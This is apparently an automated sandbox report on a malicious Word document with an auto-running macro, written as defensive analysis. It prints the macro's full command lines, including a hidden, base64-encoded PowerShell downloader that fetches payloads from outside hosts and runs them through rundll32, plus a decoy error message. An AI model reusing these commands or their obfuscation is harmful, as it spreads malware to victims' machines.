                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023A0AF13_2_0023A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002280BA13_2_002280BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002260B913_2_002260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002248BD13_2_002248BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022128013_2_00221280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023889D13_2_0023889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002312E213_2_002312E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002288E513_2_002288E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002326F513_2_002326F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00221CFA13_2_00221CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002320C513_2_002320C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002296CD13_2_002296CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00238ADC13_2_00238ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00230D3313_2_00230D33
                      Source: Bestand.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Teh9tkv0p83u4g, Function Document_openName: Document_open
                      Source: Bestand.docOLE indicator, VBA macros: true
                      Source: 00000005.00000002.2092804988.00000000001B6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2092937441.0000000001B86000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: rundll32.exe, 00000006.00000002.2097659737.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095270294.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097228304.0000000002020000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2099371824.0000000001E80000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.2104055243.0000000002010000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@34/8@4/5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_006F1C88 CreateToolhelp32Snapshot,19_2_006F1C88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,7_2_10002D70
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$estand.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC7E0.tmpJump to behavior
                      Source: Bestand.docOLE indicator, Word Document stream: true
                      Source: Bestand.docOLE document summary: title field not present or empty
                      Source: Bestand.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............f........................... .;.......;.....................................#...............................h.......5kU.............Jump to behavior
                      Source: C:\Windows\System32\msg.exeConsole Write: ............f...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......X.......L.......................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......X...............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v......................2j....................................}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v......................2j..... ..............................}..v....H.......0...............X...............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v......................2j....................................}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v......................2j....8...............................}..v............0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............K.2j....................................}..v....H?......0...............................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................B......#....................... ...............................................................................................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'.................2j....E...............................}..v.....1......0...............8...............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+.................2j....E...............................}..v.....p......0...............8...............................Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: Bestand.docVirustotal: Detection: 61%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAO
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgAHMAZQBUAC0ASQB0AEUATQAgACAAdgBhAFIAaQBBAEIATABFADoAMAA5AFAAIAAgACgAWwBUAHkAUABFAF0AKAAiAHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBGACAAJwBTAHkAJwAsACcAYwB0AE8AcgBZACcALAAnAC4AaQBvAC4ARABJAHIARQAnACwAJwBzAHQAZQBNACcAKQApACAAIAA7ACAAIAAgAHMAZQBUAC0AaQB0AEUATQAgACgAJwBWACcAKwAnAEEAcgAnACsAJwBpAEEAYgBMAEUAOgBhAHYANQAnACsAJwBMACcAKwAnAG8AUgAnACkAIAAgACgAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAMwB9AHsANAB9AHsANgB9AHsANQB9AHsAMgB9ACIALQBmACAAJwBTAHkAUwAnACwAJwBlAG0ALgBOAGUAVAAuAFMAZQByAHYAJwAsACcAZQByACcALAAnAEkAJwAsACcAYwBlAHAAbwAnACwAJwB0AE0AYQBuAGEAZwAnACwAJwBJAG4AJwAsACcAVAAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTACcAKwAnAGkAbABlAG4AJwApACsAKAAnAHQAbAB5AEMAJwArACcAbwBuAHQAJwApACsAJwBpACcAKwAoACcAbgAnACsAJwB1AGUAJwApACkAOwAkAEQAOAAxAHYAbAA2AGwAPQAkAFAAMQAyAFIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAE8AOQA4AEUAOwAkAFIAXwAxAFoAPQAoACcASwAyACcAKwAnADYARQAnACkAOwAgACAAKABHAGMAaQAgAHYAQQByAEkAQQBCAEwAZQA6ADAAOQBwACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBDAFIARQBhAGAAVABlAGAARABJAHIAYABlAGAAQwBUAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAQgAnACsAKAAnAEcAJwArACcARgBMAHEAJwArACcAcAB3AF8ANQBpAEIAJwArACcARwAnACkAKwAoACcARgBGADQAdwAwACcAKwAnAG8AJwApACsAJwBzAGMAJwArACgAJwBCAEcAJwArACcARgAnACkAKQAgAC0AQwBSAGUAcABMAEEAYwBFACgAJwBCAEcAJwArACcARgAnACkALABbAGMASABhAHIAXQA5ADIAKQApADsAJABDADYAOQBWAD0AKAAnAFUAOQAnACsAJwA0AFYAJwApADsAIAAgACgAIABWAEEAcgBpAGEAYgBsAEUAIAAgACgAIgBBAHYANQAiACsAIgBMAG8AIgArACIAcgAiACkAIAAtAHYAQQBsAHUARQBvAG4AIAApADoAOgAiAHMAYABFAGMAVQBSAGkAYABUAHkAcABgAFIATwB0AGAATwBjAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQATgA4ADAAVgA9ACgAJwBGADgAJwArACcAOABZACcAKQA7ACQAUgBnAGIAMABmAHEAcAAgAD0AIAAoACgAJwBSADkAJwArACcANQAnACkAKwAnAEYAJwApADsAJABIADIAMwBJAD0AKAAnAFYAJwArACgAJwAwACcAKwAnADQAUAAnACkAKQA7ACQARwBxAGwAdwA5AHQAZAA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAcQAnACsAJwBwAHcAXwA1AGkAewAwAH0AJwArACcARgAnACsAJwA0AHcAJwArACcAMABvAHMAYwB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAHIAXQA5ADIAKQArACQAUgBnAGIAMABmAHEAcAArACgAJwAuACcAKwAoACcAZAAnACsAJwBsAGwAJwApACkAOwAkAEQAMwA0AFMAPQAoACcAVgA1ACcAKwAnADkAVAAnACkAOwAkAEwAegA3ADQANgA4AHMAPQAoACgAJwBdAGEAJwArACcAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAnACkAKwAnAC8ALwAnACsAKAAnAGgAYQBuAGcAJwArACcAYQAnACkAKwAoACcAcgBsAGEAJwArACcAcwAnACkAKwAoACcAdABpAGsALgAnACsAJwBjACcAKQArACgAJwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAnACkAKwAoACcALQBiAGkAJwArACcAbgAvACcAKwAnAFUAaQA0ACcAKQArACgAJwBuACcAKwAnAC8AQAAnACkAKwAnAF0AYQAnACsAKAAnAG4AdwBbADMAJwArACcAOgAnACsAJwAvAC8AJwApACsAKAAnAHAAJwArACcAYQBkAHIAJwArACcAZQBlAHMAYwAnACsAJwBhAHAAJwArACcAZQBzACcAKwAnAC4AYwBvAG0ALwBiACcAKwAnAGwAJwApACsAKAAnAG8AZwAvADAAJwArACcASQAvAEAAJwApACsAKAAnAF0AJwArACcAYQBuACcAKQArACcAdwBbACcAKwAoACcAMwA6ACcAKwAnAC8ALwBzACcAKQArACcAYQAnACsAJwByACcAKwAnAHQAJwArACcAdQByACcAKwAnAGUALgAnACsAKAAnAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGkAbgBjACcAKwAnAGwAJwArACcAdQAnACkAKwAoACcAZABlAHMAJwArACcALwBKAEQAOJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
